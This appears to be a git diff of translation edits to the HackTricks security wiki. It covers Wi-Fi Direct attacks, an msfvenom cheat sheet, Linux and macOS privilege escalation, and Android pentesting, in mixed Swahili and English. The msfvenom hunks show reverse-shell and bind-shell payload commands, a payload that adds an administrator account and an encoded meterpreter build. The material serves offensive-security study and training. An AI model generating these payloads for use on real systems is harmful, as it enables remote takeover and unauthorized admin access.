haraka fremu za beaco **Wi-Fi Direct** ni itifaki inayowezesha vifaa kuungana moja kwa moja na kila mmoja kwa kutumia Wi-Fi bila haja ya kituo cha kawaida cha wireless. Uwezo huu umejumuishwa katika vifaa mbalimbali vya Internet of Things (IoT), kama vile printa na televisheni, na kuwezesha mawasiliano ya moja kwa moja kati ya vifaa. Kipengele muhimu cha Wi-Fi Direct ni kwamba kifaa kimoja kinachukua jukumu la kituo cha ufikiaji, kinachojulikana kama mmiliki wa kundi, ili kusimamia muunganisho. -Usalama wa muunganisho wa Wi-Fi Direct unafanywa kupitia **Wi-Fi Protected Setup (WPS)**, ambayo inasaidia mbinu kadhaa za kuunganishwa salama, ikiwa ni pamoja na: +Usalama wa muunganisho wa Wi-Fi Direct unafanywa kupitia **Wi-Fi Protected Setup (WPS)**, ambayo inasaidia njia kadhaa za kuunganishwa salama, ikiwa ni pamoja na: * **Push-Button Configuration (PBC)** * **PIN entry** * **Near-Field Communication (NFC)** -Mbinu hizi, hasa PIN entry, zinaweza kuwa na udhaifu sawa na WPS katika mitandao ya Wi-Fi ya kawaida, na kuifanya kuwa malengo ya mbinu sawa za shambulio. +Njia hizi, hasa PIN entry, zinaweza kuwa na udhaifu sawa na WPS katika mitandao ya Wi-Fi ya kawaida, na kuifanya kuwa malengo ya njia sawa za shambulio. ### EvilDirect Hijacking -**EvilDirect Hijacking** ni shambulio maalum kwa Wi-Fi Direct. Inafanana na dhana ya shambulio la Evil Twin lakini inalenga muunganisho wa Wi-Fi Direct. Katika hali hii, mshambuliaji anajifanya kuwa mmiliki halali wa kundi kwa lengo la kuwadanganya vifaa kuungana na chombo kibaya. Mbinu hii inaweza kutekelezwa kwa kutumia zana kama `airbase-ng` kwa kubainisha channel, ESSID, na anwani ya MAC ya kifaa kinachojifananisha: +**EvilDirect Hijacking** ni shambulio maalum kwa Wi-Fi Direct. Inafanana na dhana ya shambulio la Evil Twin lakini inalenga muunganisho wa Wi-Fi Direct. Katika hali hii, mshambuliaji anajifanya kuwa mmiliki halali wa kundi kwa lengo la kuwadanganya vifaa kuungana na chombo kibaya. Njia hii inaweza kutekelezwa kwa kutumia zana kama `airbase-ng` kwa kubainisha channel, ESSID, na anwani ya MAC ya kifaa kinachojifananisha: ## References @@ -731,7 +731,7 @@ Mbinu hizi, hasa PIN entry, zinaweza kuwa na udhaifu sawa na WPS katika mitandao TODO: Angalia [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md index 7d7dd4bd9..4eb14e3ae 100644 --- a/generic-methodologies-and-resources/reverse-shells/msfvenom.md +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -1,49 +1,49 @@ # MSFVenom - CheatSheet {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks -* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! -* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty! +Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! -**Uelewa wa Hacking**\ -Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking +**Hacking Insights**\ +Shiriki maudhui yanayochunguza msisimko na changamoto za hacking -**Habari za Hack kwa Wakati Halisi**\ -Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi +**Real-Time Hack News**\ +Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi -**Matangazo ya Hivi Punde**\ -Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa +**Latest Announcements**\ +Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! +**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! *** -## Msingi msfvenom +## Basic msfvenom `msfvenom -p -e -f -i LHOST=` Mtu anaweza pia kutumia `-a` kubaini usanifu au `--platform` -## Orodha +## Listing ```bash msfvenom -l payloads #Payloads msfvenom -l encoders #Encoders ``` -## Paramu za kawaida wakati wa kuunda shellcode +## Parametria za kawaida wakati wa kuunda shellcode ```bash -b "\x00\x0a\x0d" -f c @@ -83,7 +83,7 @@ msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe ```bash msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe ``` -### **Teua Amri** +### **Tekeleza Amri** {% code overflow="wrap" %} ```bash @@ -91,8 +91,6 @@ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Obj msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe ``` ### Encoder - -{% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe ``` @@ -123,6 +121,8 @@ msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf ```bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf ``` +{% endcode %} + ### SunOS (Solaris) {% code overflow="wrap" %} @@ -139,7 +139,11 @@ msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTAC ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho ``` +{% endcode %} + ### **Bind Shell** + +{% code overflow="wrap" %} ```bash msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho ``` @@ -177,9 +181,9 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f r ``` {% endcode %} -### WAZI +### WAZO -#### Reverse Shell +#### Shell ya Kurudi {% code overflow="wrap" %} ```bash @@ -209,14 +213,14 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f ``` {% endcode %} -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! **Uelewa wa Udukuzi**\ Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi -**Habari za Udukuzi za Wakati Halisi**\ +**Habari za Udukuzi wa Wakati Halisi**\ Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi **Matangazo ya Hivi Punde**\ @@ -225,8 +229,8 @@ Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya Udukuzi wa AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya Udukuzi wa GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index 0ec2f088e..b695125a1 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -1,4 +1,4 @@ -# Orodha ya Ukaguzi - Kuinua Haki za Linux +# Orodha ya Ukaguzi - Kuinua Mamlaka ya Linux {% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ @@ -15,39 +15,39 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na wahacker wenye uzoefu na wawindaji wa makosa! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa makosa! **Maoni ya Udukuzi**\ Shiriki na maudhui yanayoangazia msisimko na changamoto za udukuzi -**Habari za Udukuzi kwa Wakati Halisi**\ +**Habari za Udukuzi za Wakati Halisi**\ Baki na habari za kisasa kuhusu ulimwengu wa udukuzi kupitia habari na maoni ya wakati halisi **Matangazo ya Hivi Punde**\ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wahacker bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo! -### **Zana bora ya kutafuta vektori vya kuinua haki za ndani za Linux:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **Zana bora ya kutafuta vigezo vya kuinua mamlaka ya ndani ya Linux:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) ### [Taarifa za Mfumo](privilege-escalation/#system-information) * [ ] Pata **taarifa za OS** * [ ] Angalia [**PATH**](privilege-escalation/#path), kuna **folda inayoweza kuandikwa**? -* [ ] Angalia [**env variables**](privilege-escalation/#env-info), kuna maelezo nyeti yoyote? +* [ ] Angalia [**env variables**](privilege-escalation/#env-info), kuna maelezo nyeti? * [ ] Tafuta [**kernel exploits**](privilege-escalation/#kernel-exploits) **ukitumia scripts** (DirtyCow?) * [ ] **Angalia** kama [**toleo la sudo** lina udhaifu](privilege-escalation/#sudo-version) * [ ] [**Dmesg** uthibitisho wa saini umeshindwa](privilege-escalation/#dmesg-signature-verification-failed) -* [ ] Zaidi ya mfumo wa enum ([tarehe, takwimu za mfumo, taarifa za cpu, printers](privilege-escalation/#more-system-enumeration)) -* [ ] [Tathmini ulinzi zaidi](privilege-escalation/#enumerate-possible-defenses) +* [ ] Zaidi ya mfumo enum ([tarehe, takwimu za mfumo, taarifa za cpu, printers](privilege-escalation/#more-system-enumeration)) +* [ ] [Tathmini zaidi ulinzi](privilege-escalation/#enumerate-possible-defenses) ### [Diski](privilege-escalation/#drives) * [ ] **Orodhesha diski zilizowekwa** * [ ] **Kuna diski isiyowekwa?** -* [ ] **Kuna akreditif katika fstab?** +* [ ] **Kuna akreditivu katika fstab?** ### [**Programu Zilizowekwa**](privilege-escalation/#installed-software) @@ -57,7 +57,7 @@ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa ### [Mchakato](privilege-escalation/#processes) * [ ] Je, kuna **programu isiyojulikana inayoendesha**? -* [ ] Je, kuna programu inayoendesha kwa **haki zaidi kuliko inavyopaswa kuwa**? +* [ ] Je, kuna programu inayoendesha kwa **mamlaka zaidi kuliko inavyopaswa kuwa**? * [ ] Tafuta **exploits za michakato inayoendesha** (hasa toleo linaloendesha). * [ ] Je, unaweza **kubadilisha binary** ya mchakato wowote unaoendesha? * [ ] **Fuatilia michakato** na angalia kama kuna mchakato wa kuvutia unaoendesha mara kwa mara. @@ -98,24 +98,24 @@ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa ### [Watumiaji](privilege-escalation/#users) -* [ ] Orodha ya watumiaji/vikundi **kuhesabu** +* [ ] Orodha ya watumiaji/mikundi **ya jumla** * [ ] Je, una **UID kubwa sana**? Je, **mashine** ina **udhaifu**? -* [ ] Je, unaweza [**kuinua haki kwa sababu ya kundi**](privilege-escalation/interesting-groups-linux-pe/) unalotegemea? +* [ ] Je, unaweza [**kuinua mamlaka kwa sababu ya kundi**](privilege-escalation/interesting-groups-linux-pe/) unalotegemea? * [ ] **Data za Clipboard**? * [ ] Sera ya Nywila? * [ ] Jaribu **kutumia** kila **nywila inayojulikana** uliyogundua awali kuingia **na kila** **mtumiaji** anayeweza. Jaribu kuingia pia bila nywila. ### [PATH inayoweza kuandikwa](privilege-escalation/#writable-path-abuses) -* [ ] Ikiwa una **haki za kuandika juu ya folda fulani katika PATH** unaweza kuwa na uwezo wa kuinua haki +* [ ] Ikiwa una **mamlaka ya kuandika juu ya folda fulani katika PATH** unaweza kuwa na uwezo wa kuinua mamlaka ### [SUDO na amri za SUID](privilege-escalation/#sudo-and-suid) * [ ] Je, unaweza kutekeleza **amri yoyote na sudo**? Je, unaweza kuitumia KUSOMA, KUANDIKA au KUTEKELEZA chochote kama root? ([**GTFOBins**](https://gtfobins.github.io)) * [ ] Je, kuna **binary ya SUID inayoweza kutumika**? ([**GTFOBins**](https://gtfobins.github.io)) -* [ ] Je, [**amri za sudo** **zimepunguzika** na **path**? Je, unaweza **kuzidi** vizuizi](privilege-escalation/#sudo-execution-bypassing-paths)? -* [ ] [**Sudo/SUID binary bila njia iliyotajwa**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? -* [ ] [**SUID binary ikitaja njia**](privilege-escalation/#suid-binary-with-command-path)? Pita +* [ ] Je, [**amri za sudo** **zimepunguziliwa** na **path**? Je, unaweza **kuzidi** vizuizi](privilege-escalation/#sudo-execution-bypassing-paths)? +* [ ] [**Sudo/SUID binary bila path iliyotajwa**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? +* [ ] [**SUID binary ikitaja path**](privilege-escalation/#suid-binary-with-command-path)? Punguza * [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload) * [ ] [**Ukosefu wa maktaba ya .so katika binary ya SUID**](privilege-escalation/#suid-binary-so-injection) kutoka folda inayoweza kuandikwa? * [ ] [**SUDO tokens zinazopatikana**](privilege-escalation/#reusing-sudo-tokens)? [**Je, unaweza kuunda token ya SUDO**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? @@ -123,7 +123,7 @@ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa * [ ] Je, unaweza [**kubadilisha /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)? * [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) amri -### [Mamlaka](privilege-escalation/#capabilities) +### [Uwezo](privilege-escalation/#capabilities) * [ ] Je, kuna binary yoyote yenye **uwezo usiotarajiwa**? @@ -154,7 +154,7 @@ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa * [ ] **Faili za Mtandao** (nywila?) * [ ] **Nakala za Hifadhi**? * [ ] **Faili zinazojulikana ambazo zina nywila**: Tumia **Linpeas** na **LaZagne** -* [ ] **Utafutaji wa Kawaida** +* [ ] **Utafutaji wa Jumla** ### [**Faili Zinazoweza Kuandikwa**](privilege-escalation/#writable-files) @@ -165,23 +165,23 @@ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa ### [**Mbinu Nyingine**](privilege-escalation/#other-tricks) -* [ ] Je, unaweza [**kudhulumu NFS ili kuinua haki**](privilege-escalation/#nfs-privilege-escalation)? +* [ ] Je, unaweza [**kudhulumu NFS ili kuinua mamlaka**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Je, unahitaji [**kutoroka kutoka shell yenye vizuizi**](privilege-escalation/#escaping-from-restricted-shells)? -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na wahacker wenye uzoefu na wawindaji wa makosa! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa makosa! **Maoni ya Udukuzi**\ Shiriki na maudhui yanayoangazia msisimko na changamoto za udukuzi -**Habari za Udukuzi kwa Wakati Halisi**\ +**Habari za Udukuzi za Wakati Halisi**\ Baki na habari za kisasa kuhusu ulimwengu wa udukuzi kupitia habari na maoni ya wakati halisi **Matangazo ya Hivi Punde**\ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wahacker bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo! {% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index a8dcd9186..b8b6fde71 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -15,7 +15,7 @@ Jifunze & fanya mazoezi ya GCP Hacking:
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! @@ -26,13 +26,13 @@ Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi **Matangazo ya Hivi Punde**\ -Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa +Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! ## Msingi wa MacOS -Ikiwa hujafahamu kuhusu macOS, unapaswa kuanza kujifunza misingi ya macOS: +Ikiwa hujui kuhusu macOS, unapaswa kuanza kujifunza misingi ya macOS: * Faili maalum za macOS **na ruhusa:** @@ -65,7 +65,7 @@ Ikiwa hujafahamu kuhusu macOS, unapaswa kuanza kujifunza misingi ya macOS: {% endcontent-ref %} * **Opensource** macOS: [https://opensource.apple.com/](https://opensource.apple.com/) -* Ili kupakua `tar.gz` badilisha URL kama [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) kuwa [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) +* Kupakua `tar.gz` badilisha URL kama [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) kuwa [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) ### MacOS MDM @@ -97,9 +97,9 @@ Hii inaweza kutokea katika hali zifuatazo: * Faili iliyotumika tayari iliumbwa na mtumiaji (inamilikiwa na mtumiaji) * Faili iliyotumika inaweza kuandikwa na mtumiaji kwa sababu ya kundi * Faili iliyotumika iko ndani ya directory inayomilikiwa na mtumiaji (mtumiaji anaweza kuunda faili hiyo) -* Faili iliyotumika iko ndani ya directory inayomilikiwa na root lakini mtumiaji ana ufaccess wa kuandika juu yake kwa sababu ya kundi (mtumiaji anaweza kuunda faili hiyo) +* Faili iliyotumika iko ndani ya directory inayomilikiwa na root lakini mtumiaji ana ufikiaji wa kuandika juu yake kwa sababu ya kundi (mtumiaji anaweza kuunda faili hiyo) -Kuweza **kuunda faili** ambayo itatumika na **root**, inamruhusu mtumiaji **kunufaika na maudhui yake** au hata kuunda **symlinks/hardlinks** kuielekeza mahali pengine. +Kuwa na uwezo wa **kuunda faili** ambayo itatumika na **root**, inamruhusu mtumiaji **kunufaika na maudhui yake** au hata kuunda **symlinks/hardlinks** kuielekeza mahali pengine. Kwa aina hii ya udhaifu usisahau **kuangalia waandishi wa `.pkg` walio hatarini**: @@ -107,9 +107,9 @@ Kwa aina hii ya udhaifu usisahau **kuangalia waandishi wa `.pkg` walio hatarini* [macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md) {% endcontent-ref %} -### Upanuzi wa Faili & Wakala wa URL +### Mipangilio ya Faili & Wakala wa URL -Programu za ajabu zilizosajiliwa na upanuzi wa faili zinaweza kutumiwa vibaya na programu tofauti zinaweza kuandikishwa kufungua protokali maalum +Programu za ajabu zilizosajiliwa na mipangilio ya faili zinaweza kutumiwa vibaya na programu tofauti zinaweza kusajiliwa kufungua protokali maalum {% content-ref url="macos-file-extension-apps.md" %} [macos-file-extension-apps.md](macos-file-extension-apps.md) @@ -121,9 +121,9 @@ Katika macOS **programu na binaries zinaweza kuwa na ruhusa** za kufikia folda a Hivyo, mshambuliaji anayetaka kufanikiwa kuathiri mashine ya macOS atahitaji **kuinua ruhusa zake za TCC** (au hata **kupita SIP**, kulingana na mahitaji yake). -Ruhusa hizi kwa kawaida hutolewa kwa njia ya **entitlements** ambayo programu imesainiwa nayo, au programu inaweza kuomba baadhi ya ufaccess na baada ya **mtumiaji kuidhinisha** zinaweza kupatikana katika **maktaba za TCC**. Njia nyingine mchakato unaweza kupata ruhusa hizi ni kwa kuwa **mtoto wa mchakato** wenye hizo **ruhusa** kwani kwa kawaida **zinarithiwa**. +Ruhusa hizi kwa kawaida hutolewa kwa njia ya **entitlements** ambayo programu imesainiwa nayo, au programu inaweza kuomba baadhi ya ufikiaji na baada ya **mtumiaji kuidhinisha** wanaweza kupatikana katika **maktaba za TCC**. Njia nyingine mchakato unaweza kupata ruhusa hizi ni kwa kuwa **mtoto wa mchakato** wenye hizo **ruhusa** kwani kwa kawaida **zinarithiwa**. -Fuata viungo hivi kupata njia tofauti za [**kuinua ruhusa katika TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), [**kupita TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) na jinsi katika siku za nyuma [**SIP imepita**](macos-security-protections/macos-sip.md#sip-bypasses). +Fuata viungo hivi kupata njia tofauti za [**kuinua ruhusa katika TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), [**kupita TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) na jinsi katika siku za nyuma [**SIP imepitwa**](macos-security-protections/macos-sip.md#sip-bypasses). ## macOS Kuinua Privilege Kawaida @@ -145,7 +145,7 @@ Bila shaka kutoka mtazamo wa timu nyekundu unapaswa pia kuwa na hamu ya kuinua h * [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) * [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY) -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! @@ -156,7 +156,7 @@ Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi **Matangazo ya Hivi Punde**\ -Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa +Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index 926d08fa0..04667c194 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -1,36 +1,36 @@ # Android Applications Pentesting {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
{% endhint %} -
+
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi **Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! -## Misingi ya Programu za Android +## Android Applications Basics Inapendekezwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**: @@ -41,20 +41,20 @@ Inapendekezwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **sehemu muhimu za ## ADB (Android Debug Bridge) Hii ni zana kuu unayohitaji kuungana na kifaa cha android (kilichotengenezwa au halisi).\ -**ADB** inaruhusu kudhibiti vifaa ama kupitia **USB** au **Network** kutoka kwa kompyuta. Zana hii inaruhusu **kuhamasisha** faili katika mwelekeo wote, **kusakinisha** na **kuondoa** programu, **kutekeleza** amri za shell, **kufanya nakala** ya data, **kusoma** kumbukumbu, kati ya kazi nyingine. +**ADB** inaruhusu kudhibiti vifaa ama kupitia **USB** au **Network** kutoka kwa kompyuta. Zana hii inaruhusu **kuhamasisha** faili katika mwelekeo wote, **kusakinisha** na **kuondoa** programu, **kutekeleza** amri za shell, **kuhifadhi** data, **kusoma** logi, kati ya kazi nyingine. Angalia orodha ifuatayo ya [**ADB Commands**](adb-commands.md) kujifunza jinsi ya kutumia adb. ## Smali -Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **habari zilizofichwa** (labda nywila au bendera zilizofichwa vizuri). Hivyo, inaweza kuwa ya kuvutia kufungua apk, kubadilisha msimbo na kuirekebisha.\ -[**Katika tutorial hii** unaweza **kujifunza jinsi ya kufungua APK, kubadilisha msimbo wa Smali na kuirekebisha APK** na kazi mpya](smali-changes.md). Hii inaweza kuwa ya manufaa kama **mbadala kwa majaribio kadhaa wakati wa 